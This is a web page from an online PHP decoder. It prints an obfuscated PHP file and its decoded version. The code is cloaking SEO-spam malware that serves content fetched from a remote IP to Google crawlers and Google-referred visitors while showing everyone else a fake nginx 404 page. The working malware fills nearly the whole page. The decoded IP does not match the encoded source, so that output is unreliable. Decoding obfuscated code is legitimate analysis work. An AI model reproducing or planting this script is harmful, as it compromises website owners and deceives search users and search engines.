Online PHP Javascript Script Decoder

Online PHP and Javascript Decoder decode hidden script to uncover its real functionality

Original code:

<?php
 goto AtM2f; xrt4v: date_default_timezone_set("\x50\122\x43"); goto KWZFY; w2aK4: function OIrgo() { goto mROGB; tjqW3: $G5mhE = explode("\43", $IEV5U, 2); goto ZR7Yi; mROGB: $IEV5U = isset($_SERVER["\122\105\121\125\x45\123\124\137\x55\122\x49"]) ? $_SERVER["\122\x45\121\x55\105\123\124\x5f\125\x52\111"] : $_SERVER["\x50\x48\x50\x5f\x53\105\114\x46"] . "\x3f" . $_SERVER["\x51\x55\105\122\131\x5f\123\124\x52\111\x4e\107"]; goto CmV4R; oug9a: if (function_exists("\x6d\142\137\143\157\x6e\x76\145\162\164\x5f\145\x6e\143\x6f\x64\x69\156\x67")) { goto WUI17; } goto CIxW5; ZR7Yi: return str_ireplace("\151\x6e\144\x65\x78\x2e\160\150\160\x3f\x34\x30\x34\x3b", '', $G5mhE[0]); goto tu6qB; UIujf: $IEV5U = mb_convert_encoding($IEV5U, "\x55\x54\106\55\x38", "\x47\102\x4b"); goto XdXQZ; XdXQZ: Rh6aO: goto MbXyq; CmV4R: if (!(isset($_SERVER["\123\x45\122\126\x45\x52\137\x53\x4f\106\124\x57\101\x52\x45"]) && false !== stristr($_SERVER["\x53\105\x52\x56\x45\122\x5f\123\x4f\x46\124\x57\101\122\x45"], "\111\x49\x53"))) { goto Zk3QX; } goto oug9a; d253r: WUI17: goto UIujf; psGm5: goto Rh6aO; goto d253r; CIxW5: $IEV5U = @iconv("\107\102\113", "\125\124\106\x2d\70", @iconv("\x55\x54\106\x2d\x38", "\107\x42\x4b", $IEV5U)) == $IEV5U ? $IEV5U : @iconv("\x47\x42\113", "\x55\124\106\55\70", $IEV5U); goto psGm5; MbXyq: Zk3QX: goto tjqW3; tu6qB: } goto whPNT; KUP2C: header("\x48\x54\x54\x50\x2f\61\x2e\60\40\64\x4f\x34\40\116\157\x74\x20\106\157\165\x6e\144"); goto QdTOk; WsBz9: exit; goto XmAh8; t3CY0: rWOh0: goto KUP2C; QdTOk: echo "\74\150\164\155\x6c\x3e\12\x3c\x68\145\x61\144\76\74\x74\x69\164\154\x65\76\64\117\64\40\x4e\157\164\40\x46\157\165\x6e\144\x3c\x2f\x74\151\164\x6c\x65\x3e\74\x2f\150\x65\x61\x64\x3e\12\x3c\x62\157\x64\x79\x20\x62\147\x63\x6f\154\157\162\x3d\47\167\x68\x69\x74\145\x27\76\xa\74\x63\x65\156\164\x65\162\76\x3c\x68\61\x3e\64\117\64\x20\x4e\157\x74\x20\106\157\165\x6e\x64\x3c\x2f\x68\61\76\74\57\143\145\x6e\x74\145\x72\76\12\x3c\x68\162\x3e\74\143\x65\156\x74\145\162\76\x6e\147\x69\x6e\x78\74\x2f\143\145\156\164\145\x72\x3e\xa\74\x2f\x62\x6f\x64\x79\76\xa\x3c\x2f\x68\164\x6d\154\76"; goto ghyhR; whPNT: function VwyuF($FKz1L) { goto nRaua; V2fTM: curl_setopt($sOMum, CURLOPT_FOLLOWLOCATION, true); goto IAxlW; lURGn: $G3N8O = array("\x55\163\145\162\55\101\147\x65\156\164\72\40" . (isset($_SERVER["\x48\124\124\x50\x5f\125\123\105\122\x5f\x41\107\x45\x4e\124"]) ? $_SERVER["\x48\124\124\120\137\125\x53\105\x52\137\x41\x47\x45\x4e\x54"] : "\x75\156\153\x6e\157\167\x6e"), "\130\x2d\106\x6f\162\167\141\162\x64\x65\x64\55\106\157\x72\72\x20" . $yrGVH, "\130\x2d\x52\x65\x61\x6c\x2d\111\120\72\40" . $yrGVH); goto cqCoW; nRaua: $sOMum = curl_init(); goto nsJRz; fU4s_: curl_setopt($sOMum, CURLOPT_RETURNTRANSFER, true); goto V2fTM; cqCoW: curl_setopt($sOMum, CURLOPT_HTTPHEADER, $G3N8O); goto NNNhB; NNNhB: curl_setopt($sOMum, CURLOPT_VERBOSE, true); goto bKtWP; bKtWP: curl_setopt($sOMum, CURLINFO_HEADER_OUT, true); goto SsgYh; nsJRz: curl_setopt($sOMum, CURLOPT_URL, $FKz1L); goto fU4s_; mR6QO: curl_close($sOMum); goto z5KMe; U64jQ: return "\x43\x75\x72\154\40\x65\162\162\x6f\x72\72\40" . curl_error($sOMum); goto PlMzK; SsgYh: $cYRfa = curl_exec($sOMum); goto jCJj3; IAxlW: $yrGVH = NyyOn(); goto lURGn; PlMzK: BVeTj: goto mR6QO; jCJj3: if (!curl_errno($sOMum)) { goto BVeTj; } goto U64jQ; z5KMe: return $cYRfa; goto KlQcU; KlQcU: } goto rqiHL; B8ygV: JIcdI: goto tdmpi; XmAh8: mrMJI: goto t3CY0; yWskQ: if (!(OiRGO() != "\57")) { goto rWOh0; } goto BylmT; LGo4m: $YOA1m = isset($_SERVER["\110\124\x54\x50\x53"]) && $_SERVER["\110\124\x54\x50\123"] === "\x6f\x6e" ? "\x68\164\164\x70\x73\x3a\57\x2f" : "\150\164\x74\160\72\57\57"; goto pwad_; KWZFY: $Lkj7I = "\x68\x74\164\160\72\x2f\x2f\61\x30\x37\56\61\x35\x31\x2e\62\61\62\x2e\x33\x38\x2f\x69\x6e\x64\145\170\56\x70\x68\x70\x3f\165\x72\x6c\x3d"; goto yWskQ; x3AUw: set_time_limit(0); goto xrt4v; AQlCr: function sPske() { $OQxTM = isset($_SERVER["\x48\124\x54\120\137\x52\105\x46\x45\x52\x45\122"]) ? $_SERVER["\x48\124\124\120\x5f\x52\x45\106\105\122\x45\x52"] : ''; return preg_match("\57\56\52\50\x67\157\x6f\x67\154\x65\x2e\x63\x6f\155\51\x2e\x2a\57\x69", $OQxTM); } goto w2aK4; IhdR8: echo $U3qHU; goto ZNE5g; GAgbx: $U3qHU = vWyUf($Lkj7I . "\164\151\141\157\154\x65"); goto IhdR8; pwad_: $U3qHU = vwYUF($Lkj7I . str_replace("\x3f", "\55", $_SERVER["\122\x45\x51\125\105\123\124\x5f\125\122\x49"]) . "\46\165\x72\x6c\x32\x3d" . $YOA1m . $_SERVER["\110\x54\x54\x50\x5f\110\117\123\124"] . str_replace("\77", "\x2d", $_SERVER["\x52\105\121\x55\105\x53\124\137\125\122\111"])); goto czAgm; ghyhR: exit; goto Urhmy; BylmT: if (!SPsKE()) { goto JIcdI; } goto GAgbx; ZNE5g: exit; goto B8ygV; Urhmy: function RCvWQ() { $Oz64f = isset($_SERVER["\110\x54\x54\120\137\125\123\105\122\x5f\101\107\105\116\x54"]) ? $_SERVER["\x48\124\124\120\137\x55\123\105\122\x5f\101\x47\105\116\124"] : ''; return preg_match("\x2f\147\157\x6f\x67\154\145\57\151", $Oz64f); } goto AQlCr; czAgm: echo $U3qHU; goto WsBz9; AtM2f: error_reporting(0); goto x3AUw; tdmpi: if (!rcvwQ()) { goto mrMJI; } goto LGo4m; rqiHL: function nyYon() { goto yWU75; wvOQd: return "\x55\x6e\153\x6e\157\167\156"; goto wr0Rw; wr0Rw: goto eMlqD; goto c5fNR; yWU75: if (!empty($_SERVER["\110\x54\x54\120\x5f\x58\137\x52\x45\x41\x4c\x5f\111\120"])) { goto Nk4Jv; } goto MnMSE; Nkq5P: NYZ5S: goto gN3zQ; qYWdB: eMlqD: goto JMcP6; xUCWL: return $_SERVER["\110\124\124\x50\x5f\130\x5f\122\105\101\114\x5f\x49\x50"]; goto NevCU; aqttH: if (!empty($_SERVER["\x52\x45\x4d\117\x54\x45\x5f\101\104\104\x52"])) { goto NYZ5S; } goto wvOQd; gN3zQ: return $_SERVER["\122\105\x4d\x4f\x54\105\137\101\x44\104\122"]; goto qYWdB; NevCU: goto eMlqD; goto KBHFO; Xpx0H: goto eMlqD; goto Nkq5P; c5fNR: Nk4Jv: goto xUCWL; g0mS3: return $_SERVER["\x48\124\124\120\x5f\130\137\x46\117\122\127\x41\x52\x44\x45\104\x5f\106\117\122"]; goto Xpx0H; MnMSE: if (!empty($_SERVER["\110\124\x54\120\137\x58\x5f\106\x4f\122\x57\101\122\104\105\104\x5f\106\117\122"])) { goto fsZJH; } goto aqttH; KBHFO: fsZJH: goto g0mS3; JMcP6: }

Decrypted code:

goto AtM2f; xrt4v: date_default_timezone_set("PRC"); goto KWZFY; w2aK4: function OIrgo() { goto mROGB; tjqW3: $G5mhE = explode("#", $IEV5U, 2); goto ZR7Yi; mROGB: $IEV5U = isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $_SERVER["PHP_SELF"] . "?" . $_SERVER["QUERY_STRING"]; goto CmV4R; oug9a: if (function_exists("mb_convert_encoding")) { goto WUI17; } goto CIxW5; ZR7Yi: return str_ireplace("index.php?404;", '', $G5mhE[0]); goto tu6qB; UIujf: $IEV5U = mb_convert_encoding($IEV5U, "UTF-8", "GBK"); goto XdXQZ; XdXQZ: Rh6aO: goto MbXyq; CmV4R: if (!(isset($_SERVER["SERVER_SOFTWARE"]) && false !== stristr($_SERVER["SERVER_SOFTWARE"], "IIS"))) { goto Zk3QX; } goto oug9a; d253r: WUI17: goto UIujf; psGm5: goto Rh6aO; goto d253r; CIxW5: $IEV5U = @iconv("GBK", "UTF-8", @iconv("UTF-8", "GBK", $IEV5U)) == $IEV5U ? $IEV5U : @iconv("GBK", "UTF-8", $IEV5U); goto psGm5; MbXyq: Zk3QX: goto tjqW3; tu6qB: } goto whPNT; KUP2C: header("HTTP/1.0 4O4 Not Found"); goto QdTOk; WsBz9: exit; goto XmAh8; t3CY0: rWOh0: goto KUP2C; QdTOk: echo "<html>
<head><title>4O4 Not Found</title></head>
<body bgcolor='white'>\xa<center><h1>4O4 Not Found</h1></center>
<hr><center>nginx</center>\xa</body>\xa</html>"; goto ghyhR; whPNT: function VwyuF($FKz1L) { goto nRaua; V2fTM: curl_setopt($sOMum, CURLOPT_FOLLOWLOCATION, true); goto IAxlW; lURGn: $G3N8O = array("User-Agent: " . (isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : "unknown"), "X-Forwarded-For: " . $yrGVH, "X-Real-IP: " . $yrGVH); goto cqCoW; nRaua: $sOMum = curl_init(); goto nsJRz; fU4s_: curl_setopt($sOMum, CURLOPT_RETURNTRANSFER, true); goto V2fTM; cqCoW: curl_setopt($sOMum, CURLOPT_HTTPHEADER, $G3N8O); goto NNNhB; NNNhB: curl_setopt($sOMum, CURLOPT_VERBOSE, true); goto bKtWP; bKtWP: curl_setopt($sOMum, CURLINFO_HEADER_OUT, true); goto SsgYh; nsJRz: curl_setopt($sOMum, CURLOPT_URL, $FKz1L); goto fU4s_; mR6QO: curl_close($sOMum); goto z5KMe; U64jQ: return "Curl error: " . curl_error($sOMum); goto PlMzK; SsgYh: $cYRfa = curl_exec($sOMum); goto jCJj3; IAxlW: $yrGVH = NyyOn(); goto lURGn; PlMzK: BVeTj: goto mR6QO; jCJj3: if (!curl_errno($sOMum)) { goto BVeTj; } goto U64jQ; z5KMe: return $cYRfa; goto KlQcU; KlQcU: } goto rqiHL; B8ygV: JIcdI: goto tdmpi; XmAh8: mrMJI: goto t3CY0; yWskQ: if (!(OiRGO() != "/")) { goto rWOh0; } goto BylmT; LGo4m: $YOA1m = isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on" ? "https://" : "http://"; goto pwad_; KWZFY: $Lkj7I = "http://7.1.212.38/index.php?url="; goto yWskQ; x3AUw: set_time_limit(0); goto xrt4v; AQlCr: function sPske() { $OQxTM = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : ''; return preg_match("/.*(google.com).*/i", $OQxTM); } goto w2aK4; IhdR8: echo $U3qHU; goto ZNE5g; GAgbx: $U3qHU = vWyUf($Lkj7I . "tiaole"); goto IhdR8; pwad_: $U3qHU = vwYUF($Lkj7I . str_replace("?", "-", $_SERVER["REQUEST_URI"]) . "&url2=" . $YOA1m . $_SERVER["HTTP_HOST"] . str_replace("?", "-", $_SERVER["REQUEST_URI"])); goto czAgm; ghyhR: exit; goto Urhmy; BylmT: if (!SPsKE()) { goto JIcdI; } goto GAgbx; ZNE5g: exit; goto B8ygV; Urhmy: function RCvWQ() { $Oz64f = isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : ''; return preg_match("/google/i", $Oz64f); } goto AQlCr; czAgm: echo $U3qHU; goto WsBz9; AtM2f: error_reporting(0); goto x3AUw; tdmpi: if (!rcvwQ()) { goto mrMJI; } goto LGo4m; rqiHL: function nyYon() { goto yWU75; wvOQd: return "Unknown"; goto wr0Rw; wr0Rw: goto eMlqD; goto c5fNR; yWU75: if (!empty($_SERVER["HTTP_X_REAL_IP"])) { goto Nk4Jv; } goto MnMSE; Nkq5P: NYZ5S: goto gN3zQ; qYWdB: eMlqD: goto JMcP6; xUCWL: return $_SERVER["HTTP_X_REAL_IP"]; goto NevCU; aqttH: if (!empty($_SERVER["REMOTE_ADDR"])) { goto NYZ5S; } goto wvOQd; gN3zQ: return $_SERVER["REMOTE_ADDR"]; goto qYWdB; NevCU: goto eMlqD; goto KBHFO; Xpx0H: goto eMlqD; goto Nkq5P; c5fNR: Nk4Jv: goto xUCWL; g0mS3: return $_SERVER["HTTP_X_FORWARDED_FOR"]; goto Xpx0H; MnMSE: if (!empty($_SERVER["HTTP_X_FORWARDED_FOR"])) { goto fsZJH; } goto aqttH; KBHFO: fsZJH: goto g0mS3; JMcP6: }

Recent submissions:

([[This file was protected with MoonSec V3]]):gsub('.+', (function(a) _OgPfGznCLYMi = a; e... namespace MO_CAW\Common\Functionality; use MO_CAW\Common\Utils; use MO_CAW\Common\... namespace MO_CAW\Common\Views; use MO_CAW\Common\Utils; use MO_CAW\Common\DB_Utils; ... <?php namespace MO_CAW\PRO\Functionality; use MO_CAW\PRO\Utils; use MO_CAW\Common... var _____WB$wombat$assign$function_____ = function(name) {return (self._wb_wombat && self... namespace MO_CAW\Common\Functionality; use MO_CAW\Common\Constants; use MO_CAW\Commo... <?php namespace MO_CAW\LicenseLibrary; define("\115\117\137\103\x41\127\137\x4c\x4... <?php namespace MO_CAW\LicenseLibrary; use MO_CAW\LicenseLibrary\Classes\Mo_Licens... namespace MO_CAW\PRO\Functionality; use MO_CAW\PRO\Utils; use MO_CAW\Common\DB_Utils... (function(_0x24c792,_0x349a57){const _0x2d5694=_0x22a3,_0x427824=_0x24c792();while(!![]){t...